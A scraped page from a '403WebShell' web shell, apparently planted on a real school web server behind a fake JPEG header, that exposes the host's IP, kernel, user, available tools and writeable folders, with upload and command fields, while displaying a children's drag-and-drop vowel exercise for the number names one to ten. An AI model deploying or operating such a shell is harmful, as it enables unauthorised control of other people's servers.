????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 52.14.25.155
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old/Html/LevelA/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old/Html/LevelA/Category2/LevelACat2Lesson15.html
<!doctype html>
<html>
    <head>
        <title>Write the number names by filling the blanks with Vowels.</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>

        <style type="text/css">

            .style_Td
            {
                text-align:center;
                font-size: 34px;
                font-family: "Arial Rounded MT Bold";
                color: red;
            }
        
            .style_table_padding
            {
                padding-top: 5px;
                padding-bottom: 5px;
            }

            .style_Options
            {
                padding-left: 10px;
                padding-top: 0px;
                padding-bottom: 0px;
                padding-right: 0px;
                text-align: left;
                font-size: 24px;
                font-family: "Arial Rounded MT Bold";
                font-weight: bold;
                color: blue;
            }

            .style_BordersRemove
            {
                border-left: none;
                border-right: none;
                border-top: none;
                border-bottom: none;
            }

            .style_HeadLineText
            {
                padding-left: 10px;
                text-align: left;
                font-size: 24px;
                font-family: "Arial Rounded MT Bold";
                font-weight: bold;
                color: black;
            }


            .style_Answers
            {
                text-align: center;
                font-size: 30px;
                font-family: "Arial Rounded MT Bold";
                font-weight: bold;
                color: red;
            }
        
            .style_RowNumbers
            {
                text-align: center;
                font-size: 24px;
                font-family: "Arial Rounded MT Bold";
                font-weight: bold;
                color: black;
            }
        
            .style_borderNone
            {
                border:none;
                border-collapse:collapse;
            }

        </style>
        
        <script>
            function page_preLoad()
            {               
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.A, Category.No2, 15), true, true);
                shared_setFooterTable('id_tblFooter', true, true, false, true, true);
                
                shared_hideAllExceptFirstElement('id_SpanLetterO', 3);
                shared_hideAllExceptFirstElement('id_SpanLetterI', 4);
                shared_hideAllExceptFirstElement('id_SpanLetterE', 8);
            }
        
            function page_onLoad()
            {
                shared_set_debugInfo(Level.A, Category.No2);
                
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
            }

            function btnPrevious_click()
            {
                window.location = "LevelACat2Lesson14.html";
            }

            function btnNext_click()
            {
                window.location = "LevelACat2Lesson16.html";
            }        
        
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelA');
            }

            function btnLevel_click(levelName)
            {
                var urlString = "Lessons.html?" + levelName;

                var urlEncoded = encodeURI(urlString);

                window.location = urlEncoded;
            }
        
            function DragDrop(id_dropBox, text)
            {
                shared_setTextAndBackgroundColorToGreenByTrimmingText(shared_currentDropingId, id_dropBox);
                
                if (text == 'I')
                {
                    showNextILetter();
                }
                else if (text == 'O')
                {
                    showNextOLetter();
                }
                else if (text == 'E')
                {
                    showNextELetter();
                }
                
                isAllInfosMovedShowClapsAnimation();
            }
        
            function showNextILetter()
            {
                shared_unHideNextElement('id_SpanLetterI', 4);
                
                isAllInfosMovedShowClapsAnimation();
            }
        
            function showNextOLetter()
            {
                shared_unHideNextElement('id_SpanLetterO', 3);
                
                isAllInfosMovedShowClapsAnimation();
            }
            
            function showNextELetter()
            {
                shared_unHideNextElement('id_SpanLetterE', 8);
                
                isAllInfosMovedShowClapsAnimation();
            }        
            
            function isAllInfosMovedShowClapsAnimation()
            {
                var allElementIdsArray = ['id_SpanLetterO1', 'id_SpanLetterO2', 'id_SpanLetterO3','id_SpanLetterI1', 'id_SpanLetterI2', 'id_SpanLetterI3', 'id_SpanLetterI4', 'id_SpanLetterE1', 'id_SpanLetterE2', 'id_SpanLetterE3', 'id_SpanLetterE4', 'id_SpanLetterE5', 'id_SpanLetterE6', 'id_SpanLetterE7', 'id_SpanLetterE8', 'id_SpanLetterU1'];
                
                shared_is_all_infos_moved_show_claps_animationWithIsMoved(allElementIdsArray, 'shared_id_div_claps_image');                
            }

        </script>
    </head>

    <body onload="page_onLoad()">
    <div id="shared_id_div_claps_image">
    </div>
        
<table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
    <tr height="5%">
        <td>
            <header height="100%">
                <div id="id_tblHeader" align="center"></div>
            </header>
        </td>
    </tr>
    <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
        <td>
            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                  <tr height="5%">
                      <td class="style_borderNone">
                          <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="5" style="border-left: none; border-right: none; border-top: none">
                              <tr>
                                  <td width="100%" class="style_HeadLineText style_borderNone" style="border: none">
                                      <u>Fill the blanks by drag the vowels. </u><span class="style_Answers"><u>a, e, i, o, u</u></span>
                                  </td>
                              </tr>
                          </table>
                      </td>                    
                  </tr>
                  <tr height="*">
                    <td>
                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="5">
                          <tr height="100%">
                            <td>
                                <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                  <tr height="10%">
                                    <td>
                                        <table id="id_tblOptionsSet3" border="0"  width="100%" height="100%" cellspacing="0" cellpadding="0">
                                            <tr>
                                            <td width="10%" class="style_Options">Options:</td>
                                            <td class="style_Td"><span id="id_SpanLetterA1" class="cls_SpanLetterA1">a</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterE1" class="cls_SpanLetterE1">e</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterI1" class="cls_SpanLetterI1">i</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterO1" class="cls_SpanLetterO1">o</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterU1" class="cls_SpanLetterU1">u</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterO2" class="cls_SpanLetterO2">o</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterE2" class="cls_SpanLetterE2">e</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterI2" class="cls_SpanLetterI2">i</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterO3" class="cls_SpanLetterO3">o</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterE3" class="cls_SpanLetterE3">e</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterI3" class="cls_SpanLetterI3">i</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterE4" class="cls_SpanLetterE4">e</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterI4" class="cls_SpanLetterI4">i</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterE5" class="cls_SpanLetterE5">e</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterE6" class="cls_SpanLetterE6">e</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterE7" class="cls_SpanLetterE7">e</span></td>
                                            <td class="style_Td"><span id="id_SpanLetterE8" class="cls_SpanLetterE8">e</span></td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                                  <tr height="*">
                                    <td>
                                        <table width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                          <tr height="10%">
                                            <td width = "100%">
                                                <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                    <tr>
                                                        <td width = "50%" class="style_RowNumbers style_BordersRemove">1</td>
                                                        <td id="id_TdSpanLetterO1Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                        <td width = "5%" class="style_RowNumbers style_BordersRemove">ne</td>
                                                        <td width="*">&nbsp;</td>
                                                    </tr>
                                                </table>
                                            </td>
                                          </tr>
                                          <tr height="10%">
                                              <td width = "100%">
                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                          <td width = "50%" class="style_RowNumbers style_BordersRemove">2</td>
                                                          <td width = "5%" class="style_RowNumbers style_BordersRemove">tw</td>
                                                          <td id="id_TdSpanLetterO2Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                          <tr height="10%">
                                              <td width = "100%">
                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                      <tr >
                                                          <td width = "50%" class="style_RowNumbers style_BordersRemove">3</td>
                                                          <td width = "5%" class="style_RowNumbers style_BordersRemove" >thr</td>
                                                          <td id="id_TdSpanLetterE1Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td id="id_TdSpanLetterE2Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                          <tr height="10%">
                                              <td width = "100%">
                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                          <td width = "50%" class="style_RowNumbers style_BordersRemove">4</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">f</td>
                                                          <td id="id_TdSpanLetterO3Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td id="id_TdSpanLetterU1Box" width="5%" class="style_Answers style_BordersRemove cls_TdSpanLetterU1Box">__</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">r</td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                          <tr height="10%">
                                              <td width = "100%">
                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                          <td width = "50%" class="style_RowNumbers style_BordersRemove">5</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">f</td>
                                                          <td id="id_TdSpanLetterI1Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">v</td>
                                                          <td id="id_TdSpanLetterE3Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                          <tr height="10%">
                                              <td width = "100%">
                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                          <td width = "50%" class="style_RowNumbers style_BordersRemove">6</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">s</td>
                                                          <td id="id_TdSpanLetterI2Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">x</td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                          <tr height="10%">
                                              <td width = "100%">
                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                          <td width = "50%" class="style_RowNumbers style_BordersRemove">7</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">s</td>
                                                          <td id="id_TdSpanLetterE4Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">v</td>
                                                          <td id="id_TdSpanLetterE5Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">n</td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                          <tr height="10%">
                                              <td width = "100%">
                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                          <td width = "50%" class="style_RowNumbers style_BordersRemove">8</td>
                                                          <td id="id_TdSpanLetterE6Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td id="id_TdSpanLetterI3Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">g</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">h</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">t</td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                          <tr height="10%">
                                              <td width = "100%">
                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                          <td width = "50%" class="style_RowNumbers style_BordersRemove">9</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">n</td>
                                                          <td id="id_TdSpanLetterI4Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">n</td>
                                                          <td id="id_TdSpanLetterE7Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                          <tr height="*">
                                              <td width = "100%">
                                                  <table class="style_table_padding" width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                      <tr>
                                                          <td width = "50%" class="style_RowNumbers style_BordersRemove">10</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">t</td>
                                                          <td id="id_TdSpanLetterE8Box" width="5%" class="style_Answers style_BordersRemove">__</td>
                                                          <td width = "2%" class="style_RowNumbers style_BordersRemove">n</td>
                                                          <td width="*">&nbsp;</td>
                                                      </tr>
                                                  </table>
                                              </td>
                                          </tr>
                                        </table>
                                     </td>
                                  </tr>
                                </table>
                            </td>
                          </tr>
                        </table>
                    </td>
                  </tr>
            </table>
        </td>
    </tr>
    <tr height="5%">
        <td>
            <footer height="100%">
                <div id="id_tblFooter" align="center"></div>
            </footer>
        </td>
    </tr>
</table>

    <script>
            page_preLoad();
        
            new webkit_draggable('id_SpanLetterA1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterA1'}});
            new webkit_draggable('id_SpanLetterE1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterE1'}});
            new webkit_draggable('id_SpanLetterE2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterE2'}});
            new webkit_draggable('id_SpanLetterE3', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterE3'}});
            new webkit_draggable('id_SpanLetterE4', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterE4'}});
            new webkit_draggable('id_SpanLetterE5', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterE5'}});
            new webkit_draggable('id_SpanLetterE6', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterE6'}});
            new webkit_draggable('id_SpanLetterE7', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterE7'}});
            new webkit_draggable('id_SpanLetterE8', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterE8'}});
            new webkit_draggable('id_SpanLetterI1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterI1'}});
            new webkit_draggable('id_SpanLetterI2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterI2'}});
            new webkit_draggable('id_SpanLetterI3', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterI3'}});
            new webkit_draggable('id_SpanLetterI4', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterI4'}});
            new webkit_draggable('id_SpanLetterO1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterO1'}});
            new webkit_draggable('id_SpanLetterO2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterO2'}});
            new webkit_draggable('id_SpanLetterO3', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterO3'}});
            new webkit_draggable('id_SpanLetterU1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanLetterU1'}});

            webkit_drop.add('id_TdSpanLetterO1Box', {accept:["cls_SpanLetterO1", "cls_SpanLetterO2", "cls_SpanLetterO3"], onDrop : function(){DragDrop('id_TdSpanLetterO1Box', 'O')}});
            webkit_drop.add('id_TdSpanLetterO2Box', {accept:["cls_SpanLetterO1", "cls_SpanLetterO2", "cls_SpanLetterO3"], onDrop : function(){DragDrop('id_TdSpanLetterO2Box', 'O')}});
            webkit_drop.add('id_TdSpanLetterO3Box', {accept:["cls_SpanLetterO1", "cls_SpanLetterO2", "cls_SpanLetterO3"], onDrop : function(){DragDrop('id_TdSpanLetterO3Box', 'O')}});
            
            webkit_drop.add('id_TdSpanLetterI1Box', {accept:["cls_SpanLetterI1", "cls_SpanLetterI2", "cls_SpanLetterI3", "cls_SpanLetterI4"], onDrop : function(){DragDrop('id_TdSpanLetterI1Box', 'I')}});
            webkit_drop.add('id_TdSpanLetterI2Box', {accept:["cls_SpanLetterI1", "cls_SpanLetterI2", "cls_SpanLetterI3", "cls_SpanLetterI4"], onDrop : function(){DragDrop('id_TdSpanLetterI2Box', 'I')}});
            webkit_drop.add('id_TdSpanLetterI3Box', {accept:["cls_SpanLetterI1", "cls_SpanLetterI2", "cls_SpanLetterI3", "cls_SpanLetterI4"], onDrop : function(){DragDrop('id_TdSpanLetterI3Box', 'I')}});
            webkit_drop.add('id_TdSpanLetterI4Box', {accept:["cls_SpanLetterI1", "cls_SpanLetterI2", "cls_SpanLetterI3", "cls_SpanLetterI4"], onDrop : function(){DragDrop('id_TdSpanLetterI4Box', 'I')}});
            
            webkit_drop.add('id_TdSpanLetterE1Box', {accept:["cls_SpanLetterE1", "cls_SpanLetterE2", "cls_SpanLetterE3", "cls_SpanLetterE4", "cls_SpanLetterE5", "cls_SpanLetterE6", "cls_SpanLetterE7", "cls_SpanLetterE8"], onDrop : function(){DragDrop('id_TdSpanLetterE1Box', 'E')}});
            webkit_drop.add('id_TdSpanLetterE2Box', {accept:["cls_SpanLetterE1", "cls_SpanLetterE2", "cls_SpanLetterE3", "cls_SpanLetterE4", "cls_SpanLetterE5", "cls_SpanLetterE6", "cls_SpanLetterE7", "cls_SpanLetterE8"], onDrop : function(){DragDrop('id_TdSpanLetterE2Box', 'E')}});
            webkit_drop.add('id_TdSpanLetterE3Box', {accept:["cls_SpanLetterE1", "cls_SpanLetterE2", "cls_SpanLetterE3", "cls_SpanLetterE4", "cls_SpanLetterE5", "cls_SpanLetterE6", "cls_SpanLetterE7", "cls_SpanLetterE8"], onDrop : function(){DragDrop('id_TdSpanLetterE3Box', 'E')}});
            webkit_drop.add('id_TdSpanLetterE4Box', {accept:["cls_SpanLetterE1", "cls_SpanLetterE2", "cls_SpanLetterE3", "cls_SpanLetterE4", "cls_SpanLetterE5", "cls_SpanLetterE6", "cls_SpanLetterE7", "cls_SpanLetterE8"], onDrop : function(){DragDrop('id_TdSpanLetterE4Box', 'E')}});
            webkit_drop.add('id_TdSpanLetterE5Box', {accept:["cls_SpanLetterE1", "cls_SpanLetterE2", "cls_SpanLetterE3", "cls_SpanLetterE4", "cls_SpanLetterE5", "cls_SpanLetterE6", "cls_SpanLetterE7", "cls_SpanLetterE8"], onDrop : function(){DragDrop('id_TdSpanLetterE5Box', 'E')}});
            webkit_drop.add('id_TdSpanLetterE6Box', {accept:["cls_SpanLetterE1", "cls_SpanLetterE2", "cls_SpanLetterE3", "cls_SpanLetterE4", "cls_SpanLetterE5", "cls_SpanLetterE6", "cls_SpanLetterE7", "cls_SpanLetterE8"], onDrop : function(){DragDrop('id_TdSpanLetterE6Box', 'E')}});
            webkit_drop.add('id_TdSpanLetterE7Box', {accept:["cls_SpanLetterE1", "cls_SpanLetterE2", "cls_SpanLetterE3", "cls_SpanLetterE4", "cls_SpanLetterE5", "cls_SpanLetterE6", "cls_SpanLetterE7", "cls_SpanLetterE8"], onDrop : function(){DragDrop('id_TdSpanLetterE7Box', 'E')}});
            webkit_drop.add('id_TdSpanLetterE8Box', {accept:["cls_SpanLetterE1", "cls_SpanLetterE2", "cls_SpanLetterE3", "cls_SpanLetterE4", "cls_SpanLetterE5", "cls_SpanLetterE6", "cls_SpanLetterE7", "cls_SpanLetterE8"], onDrop : function(){DragDrop('id_TdSpanLetterE8Box', 'E')}});

            webkit_drop.add('id_TdSpanLetterU1Box', {accept:["cls_SpanLetterU1"], onDrop : function(){DragDrop('id_TdSpanLetterU1Box', 'U')}});
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit